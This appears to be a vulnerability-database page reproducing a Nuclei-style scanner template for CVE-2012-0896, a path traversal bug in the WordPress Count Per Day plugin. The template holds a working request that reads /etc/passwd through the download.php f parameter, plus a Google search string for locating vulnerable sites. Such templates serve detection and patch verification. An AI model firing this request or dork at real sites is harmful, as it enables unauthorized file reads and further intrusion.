CVE-2012-0896: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access

2025-08-01 Count Per Day PoC Public

Description

An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.

PoC

id: CVE-2012-0896

info:
  name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
  author: daffainfo
  severity: medium
  description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further compromise of the system.
  remediation: |
    Upgrade to a patched version of the Count Per Day plugin (version 3.2 or above) or apply the vendor-supplied patch to fix the path traversal vulnerability.
  reference:
    - https://packetstormsecurity.com/files/108631/
    - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
    - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
    - http://wordpress.org/extend/plugins/count-per-day/changelog/
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/72385
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2012-0896
    cwe-id: CWE-22
    epss-score: 0.22664
    epss-percentile: 0.97603
    cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: count_per_day_project
    product: count_per_day
    google-query: inurl:"/wp-content/plugins/count-per-day"
  tags: cve,cve2012,packetstorm,lfi,wordpress,wp-plugin,traversal,count_per_day_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5015aeb1a2886625ccc46eedaaa2865136dd4f8823f2b8bc61ed412111673ef0220336d8cf2d55a1d8144c98f40855f3fa2a3b4fd207677fd66560e82a466bd46de:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities